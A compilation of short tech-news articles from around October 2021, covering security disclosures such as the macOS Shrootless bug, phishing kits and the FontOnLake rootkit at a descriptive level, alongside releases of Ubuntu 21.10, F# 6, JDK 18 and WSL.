Microsoft researchers has discovered a vulnerability in how Apple-signed packages are installed with post-install scripts, which could allow an attacker to bypass System Integrity Protection (SIP) in macOS systems.

SIP is a security feature in macOS that restricts a root user access to perform operations that could compromise system integrity. But the vulnerability dubbed "Shrootless" and tracked as CVE-2021-30892, could allow threat actors to create a malicious file and install in infected system that would hijack the installation process.

The attacker could also install a rootkit, with which to overwrite system files, or install more persistent, undetectable malware.

How 'Shrootless' Bug Could allow Attackers Install Rootkit on macOS Systems?



SIP was introduced in macOS Yosemite, also known as "rootless" — that essentially locks down macOS system from root by leveraging the Apple sandbox technology to protect the entire platform.



Now the only legitimate means to disable SIP is simply booting into recovery mode and turning SIP off. And the Turning of SIP on or off is done via the built-in csrutil tool, which also can display the SIP status: Therefore, the researchers looked at macOS processes entitled to bypass SIP protections, which led to the discovery of a software daemon called "system_installd" that enables any of its child processes to circumvent SIP filesystem restrictions.

The successful exploitation of bug could enable a malicious actor to modify protected parts of the file system, including the ability to install malicious kernel drivers, also known as rootkits.

How to Mitigate against the New 'Shrootless' Bug?



Microsoft promptly shared the findings with Apple via Coordinated Vulnerability Disclosure (CVD) through Microsoft Security Vulnerability Research (MSVR). And a fix for the vulnerability was included in the security updates released by Apple on October 26, 2021.

Apple, therefore, recommends that macOS users should update their systems to safeguard from the security problem, as the new OS is beefed up with additional restrictions.

New SIP bypass vulnerability allow attackers break into macOS Systems

Despite the controversy surrounding the AI-driven programming assistant, Copilot, GitHub has gone ahead to add support for more editors like JetBrains IDE and Neovim, along with multiline code completions in languages such as C, C++, C# and Java.

While the early preview was launched with Visual Studio Code extension only, with very few languages supported, Copilot now support programming languages such as JavaScript, TypeScript, Python, Ruby, and Go.

Copilot remains in preview stage, with the support for editors like Neovim and JetBrains IDEs, still expected to be launched in thenext updates with focus on JetBrains’ IntelliJ and PyCharm.

What is GitHub Copilot?



Copilot is an AI system trained on a selection of English language, powered by OpenAI Codex, and source code derived from publicly available repositories on GitHub.



It draws on the context of class names, function and method names, with comments to generate and synthesize the code offering developers with suggestions for new lines of code or functions in the editor. Copilot provides synthesized code suggestions, not just verbatim comments, and safeguards are being implemented to ensure that verbatim comments don't make it into code suggestions.

GitHub also discovered that code snippet suggestions verbatim were about 0.1% of the time. It also suggested that a fair amount of human intervention will be required when working with Copilot.

How to Get Started with Copilot?



Developers are enjoined to sign up to the waitlist to try out Copilot via the GitHub Copilot portal.

The company is keen to engage in a discussion with developers on topics and lead in setting up appropriate standards for training AI models.

GitHub Copilot extends Support for JetBrains IDE

F# 6 is Microsoft's effort to make F# simpler and boost performance, ranging from the language design, tooling and library, with the major goal of removing unnecessary hurdles on the path to adoption.

The new version is more uniform and interoperable with other .NET languages, and according to Microsoft, F# 6 will ship with .NET 6 RC2 and Visual Studio 2022 RC2, and serves as the next step to making it easier for users to write robust, succinct and performant code.

And perhaps, the major technical feature in F# 6 remains authoring asynchronous tasks more performant, and interoperability with other .NET languages like C#.

What's New in F# 6?



F# 6 provides the feature “overloaded custom operations in computation expressions” which since F# 5.0 has been in preview; the feature allows for simpler DSLs in F# including for web programming and validation.



While F# includes active patterns feature that allows users extend pattern matching in intuitive ways, with F# 6, the feature has been augmented with optional Struct representations for active patterns. Also, in F# 6, the “as” pattern can now itself be a pattern, which is important when a type test has given a stronger type to an input.

The in-memory cross-project referencing feature simplifies working between C# projects, as it allows C# projects to reflect immediately in an F# project without recompiling the C# project on disk.

Additionally, F# developers have the benefit of .NET 6 improvements to satisfy packaging rules for commonly used Linux distributions, and profile-guided optimization, can compile startup code with reduce binary size, at higher quality, and rearrange application binaries so that code used at startup is collocated at the start of the file.

How to Get Started with F# 6?



F# 6 release coincides with the release of Visual Studio 2022 on Windows and F# programmers using this IDE experience will benefit from several improvements in this release.

Visual Studio 2022 on Windows is now available as a 64-bit application, which means you can open, edit, run, and debug even the biggest and most complex solutions without running out of memory.

What's New in Microsoft’s F# 6 Programming Language?

Microsoft 365 Defender Threat Intelligence Team has uncovered a unique phishing kit, which it dubbed ToadyZoo, built from code copied from other kits, and available for sale publicly to be reused and repackaged by other kit resellers.

According to the security team, the name “TodayZoo” was picked because of the curious use of these words in the kit's credential harvesting component in past campaigns, which likely is a reference to phishing pages that spoofed a popular video conferencing app.

TodayZoo contained pieces of code copied from other widely circulated kits, with the copied code segments having the comment markers, and other holdovers from previous kits and thus, provides rich insight into the state of the phishing and email threats today.

What is a Phishing Kit?



Also known as a “phish kit”, a phishing kit refers to various parts of a software set meant to facilitate phishing, most commonly used to archive file containing scripts and HTML pages that enable an attacker to easily set up an evasive phishing page to steal credentials.



These phishing kits are sold in underground forums for a one time payment. It also can specifically refer to the unique page itself that spoofs a brand in order to lure users into disclosing their credentials, which are often posted to an asset the attacker controls.

For instance, the researchers observed a series of phishing campaigns that abuse the AwsApps[.]com domain to send email messages that eventually directed users to the spoofed landing pages, the attackers were able to create malicious accounts at scale, with the sender emails appearing with randomly generated domain names.

How TodayZoo represents the latest Trends in the Phishing landscape?



TodayZoo and other phishing kits presents several insights into the underground phishing threat landscape, it further proves that most phishing kits are available based on a smaller cluster of larger kit units.

Albeit this trend isn't quite new, but it continues to serve as the norm, given how phishing kits share large amounts of code among themselves. And the presence of dead links and callbacks to other kits also indicates that phishing kit distributors and operators have easy access to existing kits for reuse to make new ones faster.

Hackers deploy Phishing Kit in widespread Credential Stealing Attacks

MX Linux is a relatively popular Linux/GNU distribution that offers a lot of potential by providing a complete operating system backed by the MX repository, Debian and antiX Linux.

The MX Linux team has released MX Linux 21 based on Debian 11 “Bullseye” and running Linux Kernel 5.10 LTS, with bug fixes and several application updates, coming as the first stable release of the “Wildflower” series.

MX Linux 21 introduces a new edition with Fluxbox 1.3.7, that works seamlessly on high-end computers but light on resources to also support older computers.

What's New in MX Linux 21 “Wildflower” Release?



MX Linux 21 included the Fluxbox edition which will be available as a separate ISO file, along with the regular XFCE and KDE desktop editions.



Fluxbox is a lightweight window manager which is capable of running on both older and modern systems, while the MX community decided to customize the Fluxbox capabilities to bring a unique desktop experience along with a set of pre-installed XFCE apps. Below are other Improvements in MX Linux 21:

  • Better realtek wifi support
  • MX-Tour showing an overview of each desktop environment
  • Xfce 4.16, Plasma 5.20, fluxbox 1.3.7 with mx-fluxbox 3.0 configs
  • New UEFI live system boot menus. UEFI live users can now select your live boot options
  • New installer partition selection/management area, including some lvm support if lvm volume exists already and the ability to set existing data partitions to be mounted on install
  • MX-Comfort default theming, including dark variants and “thick border” Xfwm variants
  • Mesa vulkan drivers are installed by default


Furthermore, there is the UEFI Live boot menus and extra “rollback” boot option, though the live system may likely not boot on systems with secure boot enabled.

How to Download or Upgrade to MX Linux 21?



For a fresh installation, the ISO image of MX Linux 21 can be downloaded from the official website. And you can create an MX Linux bootable USB and then install it, once you download the required image.

For those already using MX Linux 19 ‘Patito Feo’ series, you can update your system to MX-21 by manually upgrading your packages.

MX Linux 21 “Wildflower” Release: What's New?

Microsoft has released a preview of Visual Studio Code for the Web which offers a free, zero-install Visual Studio Code experience running completely on the browser.

While this isn't the first attempt at bringing VS Code to the web, as Microsoft had in 2019 released a web-based version of its Code Editor, Visual Studio Online, which was previously in a private testing with select developers. But the initiative later morphed into GitHub Codespaces and remains under the direction of GitHub.

Now, the new VS Code for the Web provides many of the features of VS Code desktop, including search and syntax highlighting while browsing and editing, along with support for extension to work on your codebase and make edits simpler.

How VS Code for the Web differs from VS Code desktop?



The new VS Code for the Web is a browser-based version of the popular code editor, allowing easy navigating of files and repositories and committing lightweight code changes.



For developers who need access to a runtime to run, build, or debug their code, it is recommended moving to the desktop application or GitHub Codespaces for full access to capabilities of VS Code. Also, VS Code desktop allows you to run extensions that are not yet supported in the web version, and make use of a full set of keyboard shortcuts not limited by browser.

As VS Code for the Web runs entirely in a web browser, it offers a very limited execution environment. Albeit, support for Azure Repos in Visual Studio Code for the Web is already in preview, and the experience will help it to improve over time.

Getting started with VS Code for the Web



VS Code for the Web is live at https://vscode.dev, you can create a local file or new project, or perhaps, work on an existing local project, and access source code repositories that are hosted elsewhere, such as on GitHub and Azure Repos, part of Azure DevOps.

And to work with both GitHub and Azure Repos, you should note that VS Code for the Web supports only two routes, vscode.dev/github and vscode.dev/azurerepos:

Microsoft brings VS Code to the Web Browser

Social Engineering Campaigns involve the use of deception to get web users into disclosing personal information that could be used for fraudulent purposes, using a variety of techniques such as phishing, whaling, and pharming.

Google’s Threat Analysis Group (TAG) has disclosed tracking a group of hackers recruited in a Russian-speaking forum, that lure their target with fake collaboration opportunities, to hijack their YouTube channel, and then sell it off to the highest bidder or use the channel to broadcast cryptocurrency scams.

As many YouTube creators provide their email address on the channel for easy contact for opportunities, the attackers would forge business emails impersonating an existing company requesting a collaboration.

How Attackers use Social engineering to hijack YouTubers accounts?



Typically, the phishing starts with a custom email of the company introducing its products, and if a target agrees to the deal, a malware page disguised as a software download URL will be sent via email or a PDF, or in some cases, Google documents containing the phishing links.



There are several domains associated with forged companies registered by the attackers and multiple websites built for malware delivery. According to TAG, at least 1,011 domains were created solely for this purpose, with some of the websites clone of legitimate software sites, such as Cisco, and games on Steam, with some generated using online templates.

The researchers identified around 15,000 actor accounts, most of which were created for this campaign specifically. There is also another technique employed by the hackers known as 'pass-the-cookie attack' which is a session hijacking technique that enables anyone access to user accounts with session cookies stored in the browser.

Though the technique has been around for some time, its resurgence could be due to the wider adoption of multi-factor authentication (MFA) that makes it difficult for attackers to break into accounts, hence the shift to social engineering tactics.

How to Mitigate against Social Engineering Attacks?



As the threat actors becomes more sophisticated in their attacks, it is important that web users remain aware of the types of threats and take appropriate steps to further protect their accounts.

Most importantly, they need to activate multi-factor authentication which provides an extra layer of security to account in case password is leaked or stolen. And also enable the “Enhanced Safe Browsing Protection” mode in Chrome browser, which feature increases warnings on potentially suspicious web pages.

YouTube Influencers targeted in New Social Engineering Campaign

Threat actors had mostly targets financial companies, and reason is not farfetched, as these organizations possess a trove of customer data that is a gold mine to hackers.

There is a massive phishing campaign dubbed MirrorBlast which targets financial services organizations. MirrorBlast contains malicious links which download a weaponized Excel document, and due to the extreme lightweight of the macro embedded in its Excel files, it is particularly difficult to detect by security and sandboxing technologies.

The current phishing campaign as tracked by the Morphisec Labs team began in early September, with the attack chain of the infection bearing a similarity to the tactics, techniques, and procedures commonly used by the Russia-based threat group TA505.

How MirrorBlast Spreads through Mass Email Campaigns?



The MirrorBlast attack chain starts with an email attachment document that poses as a file share request, which at a later stage, changes to the use of Google feedproxy URL with SharePoint and OneDrive lure.



The Google feedproxy URLs lead to a compromised SharePoint or fake OneDrive website that the attackers use to evade detection, in addition to a SharePoint sign-in requirement that helps to evade sandboxes. And there are different variants of the document, for the first variants, the macro code was hidden behind the Language and Code document information properties, which later is moved to the sheet cells.

Additionally, there wasn’t any anti-sandboxing and the code added one more obfuscation layer on top of the previous obfuscation.

The success of campaign, however, hinges on the enabling of macros by users after opening the malicious attachments, which an obfuscated MSI file is downloaded to install the next-stage loaders before delivery of the updated version of the Trojan that incorporates obfuscated API calls.

How to Mitigate against MirrorBlast Phishing Campaign?



The MirrorBlast attack have very low detections in VirusTotal, which is indicative of the advancement most threat groups have reached in evading detection-centric solutions.

Organizations should therefore take a defensive, reactive approach to their security and most importantly, remain constantly vigilant, iterating on security procedures to ensure they are not caught off-guard when new TTPs are deployed to breach their defenses.

New Email Phishing Campaign targeting Financial Companies

Tianfu Cup is China's version of Pwn2Own, which in its fourth rendition, like last year's edition, the hacking contest took place in Chengdu, China.

While Tianfu Cup 2021 which has just ended showed off hacking attempts against a number of popular programs, including Windows 10, Linux and popular browsers such as Chrome and Safari, with the hackers successfully hacked several of such popular software programs.

There are multiple other software programs from Microsoft, Adobe, Mozilla, and ASUS that were also successfully hacked with previously unknown exploits in Tianfu Cup 2021.

Major Exploits at Tianfu Cup 2021 Hackathon



The two-day hacking contest took place on October 16 and 17, with several security researchers competing for the prize money. Kunlun Lab took the top spot by winning $654,500 for successful exploits of iOS 15, including a remote code execution flaw in mobile Safari.



Also, the Kunlun Lab researchers pwned Google Chrome by getting Windows system kernel level privilege with two bugs, and the PangU team emerged second with a haul of $522,500 for a remote jailbreak in iPhone 13 Pro running iOS 15, which marks the first time the new iPhone model has been hacked at a public contest, while the VRI team came third by winning a total of $392,500.

Besides the above exploits, several hacks were mounted successfully against targets such as:

  • VMWare Workstation
  • Ubuntu 20/CentOS 8
  • Microsoft Exchange Server
  • Adobe PDF Reader
  • ASUS RT-AX56U router
  • Parallels Desktop
  • Docker CE
  • QEMU VM


The hacking competition also showed off successful hacking attempts against VMWare ESXi, Adobe PDF Reader and Synology DS220j DiskStation, among others.

The Tianfu Cup hackathon had the overriding idea of using web browsers to navigate a remote URL or using a flaw in the software to control the browser or any of the underlying operating systems.

Tianfu Cup Hackathon ended with iOS 15, Chrome and Windows 10 pwned

The latest non-LTS release, Ubuntu 21.10, codenamed “Impish Indri” is now available for download; albeit, it will receive support for only nine months, that is, until July 2022.

While the current Long-term support (LTS) release Ubuntu 20.04 LTS, as LTS release will get major updates and improvements until 2030. Now, let's see if there are any compelling features to make users on Ubuntu 20.04 LTS to want to upgrade to this non-LTS release.

The codename for Ubuntu 21.10, Impish Idri, means “showing no respect for something in a way that is amusing” or to put it another way, inclined to mischief.

What’s New in Ubuntu 21.10 “Impish Indri” Release?



Ubuntu 21.10 brings the long awaited GNOME 40, which is an exciting upgrade and several other notable improvements.



GNOME 40 offers a refreshing change to Ubuntu, but only after experiencing it, can you actually tell. Here’s a quick rundown of what to expect with this release.

  • Refreshed Installer
  • PulseAudio 15 With Bluetooth LDAC Support
  • Wayland Session with NVIDIA Proprietary Driver
  • Package updates to LibreOffice, Thunderbird
  • Firefox as a Snap by default
  • Linux Kernel 5.13


Additionally, the mixed theme feature has been ditched in Ubuntu 21.10, rather opting for light/dark theming. And Linux Kernel 5.13 inclusion means there will be support for advanced Intel and AMD chips, also Apple M1 support.

How to Download or Upgrade to Ubuntu 21.10?



For a fresh installation, the ISO image of Ubuntu 21.10 is now available for download on the official website. And for existing users of Ubuntu 20.04 LTS, you'll get the option of automatic upgrade via the Update Manager.

However, it is recommended that users of Ubuntu 20.04 LTS should wait for the next LTS release, Ubuntu 22.04 LTS.

Ubuntu 21.10 “Impish Indri” Release: What’s New?

LibreOffice is an open-source office productivity software suite, mostly used by adherents of Linux distributions and it is run and maintained by The Document Foundation.

While LibreOffice supports digital signatures of ODF documents and macros within docs, it tends to present visual aids that alteration of the document never occurred since the last signing and validation of the signature. But, there are some vulnerabilities in how LibreOffice handles the documents, as an Improper Certificate Validation in LibreOffice could allow an attacker to create a digitally signed ODF document.

The attacker could modify a digitally signed ODF document to insert additional signing time timestamp by manipulating the documentsignatures.xml or macrosignatures.xml stream within the doc, which LibreOffice would then present as a valid signature.

How the exploitation of the Flaws could allow an attacker to Manipulate the Timestamp of signed ODF documents?



The exploitation of the flaws, which are three in number, could permit an attacker to alter the contents of a doc or self-sign a document with an unvalid signature, and manipulate the timestamp of signed ODF documents, including altering the contents of a document.



LibreOffice will incorrectly display a valid signature indicator suggesting that the document was not tampered with since the signing, and presents the signature with an unknown algorithm as legitimately issued by a trusted party.

The vulnerabilities could also be weaponized by malicious actors to alter documents, making them appear as if digitally signed by a trusted source.

How to Mitigate against LibreOffice's Digital Signature Spoofing?



The discovery was credited to NDS of Ruhr University Bochum who reported the flaws, and The Document Foundation has promptly issued security fixes for the three vulnerabilities.

The flaws were fixed in LibreOffice versions 7.0.5, 7.0.6, 7.1.1 and 7.1.2. Therefore, it is recommended that users of LibreOffice should update their software to the latest versions.

LibreOffice susceptible to Critical Digital Signature Spoofing Flaws

Java Development Kit (JDK) 18 release is still some months away, and the next upgrade Java 18 has already started to take shape, with the simple web server proposal and proposal for a re-incubation of a foreign function and memory API.

While Java 17 brought new interface types for PRNGs including jumpable PRNGs and implementations of an additional class of splittable PRNG algorithms (LXM); the new interface, dubbed RandomGenerator, offered a uniform API for all new and existing PRNGs.

The JDK Enhancement Proposal (JEP) index of Java technologies cites the record patterns and an array of proposals as expected for JDK 18, albeit, it has not been marked officially.

What to Expect in Java 18 and the Final Release date?



Java 18 is due for release in March 2022, and has already started to take shape, with proposals to preview record patterns and array patterns, incubate the vector API, and adopt UTF-8 as the default character set.



JDK 17 was a long-term support (LTS) release, which means it will receive at least eight years of support from Oracle, while JDK 18 is a short-term feature release that be supported for only six months. Below are some of the officially targeted JDK 18 proposals:

  • Foreign function and memory API: The intent is to replace JNI with a superior and pure Java development model
  • Code snippets in Java API: the introduction of @snippet tag for JavaDoc’s Standard to simplify the inclusion of example source code in API documentation
  • Preview of record patterns and array patterns: the Java language would be enhanced with record patterns to deconstruct record values, array patterns, and to deconstruct array values
  • Vector API: concerns vector computations that compile at run time to optimal vector instructions on supported CPUs, achieving performance superior to equivalent scalar computations
  • Simple web server proposal: a command-line tool that would be provided to start a minimal web server which serves static files only


If you're a developer and want an early-access to open source builds of JDK 18, you can get it at jdk.java.net. But note that JDK 18 is not due until March 2022, and it would be supported for only six months.

JDK 18: What to Expect in Java 18 and the Final Release date?

Windows Subsystem for Linux (WSL) is a compatibility layer for native running of Linux binary executables on Windows machines, introduced as a feature in Windows 10.

Now, Microsoft has launched a standalone WSL application in the Microsoft Store for Windows 11 machines, which will allow users to get the latest WSL updates and features faster, without the need to modify their Windows version. Albeit, this as an initial preview to help ensure the best quality before making it generally available.

Microsoft maintains that WSL app is the exact same WSL that users are already familiar to and love, all that was changed is how it gets installed and updated.

Why WSL Users should be excited about this big change?



Before now, WSL served as an optional component inside of Windows, which means that users need to avail the “Turn Windows Features on or off” dialogue to enable it, and it requires you restarting your machine.



And the binaries that make up WSL’s logic are part of the Windows image, and serviced and updated as part of Windows itself. But with WSL app, you can get access to WSL features faster, and don’t have to worry about updating your Windows version to get the latest WSL updates.

This change simply decoupled WSL from Windows version, allowing users to update through the Microsoft Store. Now, once new features such as GPU compute and Linux file system drive mounting are released, you'll get access to it right away on your machine without the need to update the entire Windows OS.

How to Download and install WSL App from the Microsoft Store?



Firstly, you should make sure your machines is running a Windows 11 build or higher (Windows build number 22000 or higher) and that the Virtual Machine Platform optional component is enabled.

This can be done by running: dism.exe /online /enable-feature /featurename:VirtualMachinePlatform /all in an elevated PowerShell prompt Click on this link to go the Microsoft store page for WSL app and click Install to install WSL, and then you can install any Linux distro of your choice to start using it.

Microsoft debuts WSL App for Windows 11 in the Microsoft Store

There is a new malware family, dubbed "FontOnLake" by cybersecurity firm ESET, that utilizes custom and well-designed modules, and mainly targets systems running Linux.

And the modules employed by this malware are constantly under development and offer remote access to the operators, including collection of credentials, and serving as a proxy server; while to collect data or conduct other malicious activity, this malware uses modified legitimate binaries that are adjusted to load further components.

The sneaky nature of FontOnLake in combination with the advanced design suggest that they are used in targeted attacks; with the binaries such as cat, kill or sshd which are commonly used on Linux systems and additionally serve as a persistence mechanism.

How FontOnLake Rootkit Malware targets Linux Systems?



According to ESET researchers, the first known file of this malware family appeared on VirusTotal last May, with other samples uploaded throughout the year. The location of the C&C server from which the samples were uploaded to VirusTotal might indicate that its targets are mainly in Southeast Asia.



FontOnLake’s currently known components can be divided into the following groups: Trojanized applications, Backdoors and Rootkits – which are kernel mode components that mostly hide and disguise their presence, assist with updates, or provide fallback backdoors.

The trojanized applications are used mostly to load custom backdoor or rootkit modules, but aside from that, they can also collect sensitive data. And all the trojanized files are standard Linux utilities, with each serving as a persistence method because they are commonly executed on system start-up. Albeit, the initial way these trojanized applications get to their victims is yet unknown.

The different backdoors discovered are written in C++ and all use, though in slightly different ways, the same Asio library from Boost for asynchronous network and low-level I/O. With Poco, Protobuf, and features from STL such as smart pointers used as well.

How to Mitigate against FontOnLake Malware?



For organizations or individuals who want to protect their Linux endpoints or servers from this malware threat, they should use a multilayered security product and ensure that their version of Linux distribution is updated to the latest version.

If you require further technical details on FontOnLake, you can check out the comprehensive white paper provided by ESET.

Linux Systems targeted in New Rootkit Malware campaign

GitHub Enterprise Cloud now allow users the ability to centrally manage team memberships through their identity provider, using GitHub’s Enterprise Managed Users service.

With Enterprise Managed Users service, organizations can connect identity providers such as Azure Active Directory and Okta directly to GitHub Cloud, which enables management of GitHub identity and access for employees, and helps to streamline processes like onboarding and user group management.

The move is perhaps intended to help organizations of all sizes to easily transition software development operations to the cloud.

About GitHub's Enterprise Managed Users Service



GitHub's Enterprise Managed Users service allows you to control the user accounts of enterprise members through identity provider (IdP).



And you can simplify authentication with SAML single sign-on (SSO) and deprovision user accounts for enterprise members, with users assigned to the GitHub Enterprise Managed User application in the IdP provisioned as new user accounts on GitHub and added to your enterprise. You can control usernames, profile data, team membership, and repository access from the IdP.

Also, team membership can be managed within an organization in your enterprise directly through your IdP, allowing you repository access using groups in your IdP and organization membership can be managed manually or automatically as managed users are added to teams within the organization.

You can grant managed users access to contribute to repositories within your enterprise, but managed users can't create public content or collaborate with other users, organizations, and enterprises on GitHub.

However, to use Enterprise Managed Users, you'll need a separate type of enterprise account with Enterprise Managed Users enabled. You can check the "About enterprises with managed users" for more information about creating this account.

Azure Active Directory and Okta connects directly to GitHub Cloud

Apache Airflow is an open-source workflow management platform that simplifies the process of creating and managing complex workflows, with plug-and-play integrations with many technologies.

As workflow management platforms are indispensable for automating business and IT tasks, making it easier to create, schedule and monitor workflows; they are typically cloud-based for increased accessibility and scalability. However, misconfigured instances could make these platforms ideal for exploitation by hackers.

Intezer researchers discovered a misconfiguration in the popular workflow platform, with Apache Airflow having a number of unprotected instances. These unprotected instances expose sensitive data of several popular companies across the world running such services as Amazon Web Services (AWS), Google Cloud Platform (GCP), and GitHub Enterprise Cloud.

How Misconfigured Airflows leads to Credentials leakage of Popular Services



The configuration file (airflow.cfg) which is created when Airflow is started contains Airflow’s configuration and it can be changed. This file can also contain sensitive information such as passwords and keys.



The main risks of a misconfigured Airflow instance is the exposed credentials, which can give a threat actor access to legitimate business accounts and databases, with the ability to perform lateral movement. If the setting in the file “expose_config” is set to “True,” it makes it possible for anyone to access the configuration from the web server UI, which can expose credentials.

According to the researchers, the most common way to leak credentials in Airflow is through insecure coding practices, with many instances of hardcoded passwords discovered inside the Python DAG code. There is the possibility too that Airflow plugins can be abused to run malicious code.

When these instances are exposed to the internet the data becomes accessible to everyone, since the authentication is disabled. And the leakage of sensitive data essentially means that attackers can have access to information on the organization with the exposed server.

How to Mitigate against Apache Airflow bug?



Apache made great progress with Airflow in terms of security features implemented in version 2.0, which changes included the following: enforced login and authentication required for all operations in the REST API, among others

Therefore, it is strongly recommended that users should update their version of Airflow instances to the latest version. And also make sure that only authorized users can connect to the platform.

Apache Airflow bug exposes Sensitive Data of many Popular Companies